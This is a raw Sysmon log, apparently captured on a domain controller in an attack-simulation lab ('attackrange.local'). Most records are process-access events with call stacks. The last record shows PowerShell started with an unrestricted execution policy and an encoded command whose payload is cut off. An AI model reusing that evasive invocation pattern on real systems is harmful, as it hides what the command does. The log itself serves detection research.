11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.355{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6438-6064-C402-00000000AD01}4332C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.355{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6438-6064-C402-00000000AD01}4332C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.355{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6438-6064-C402-00000000AD01}4332C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.356{266CAFBE-6438-6064-C402-00000000AD01}4332C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-62DA-6064-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.261{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.261{266CAFBE-62DA-6064-0A00-00000000AD01}8481120C:\Windows\system32\services.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:51.136{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:51.136{266CAFBE-62DA-6064-0A00-00000000AD01}848920C:\Windows\system32\services.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:51.127{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-62DA-6064-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{266CAFBE-62DA-6064-0A00-00000000AD01}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local2021-03-31 11:59:52.402Started13.014.50 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.887{266CAFBE-642D-6064-9002-00000000AD01}45804660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-642D-6064-8F02-00000000AD01}3868C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.809{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.809{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.809{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.793{266CAFBE-6439-6064-C702-00000000AD01}32081188C:\Windows\system32\cmd.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.798{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
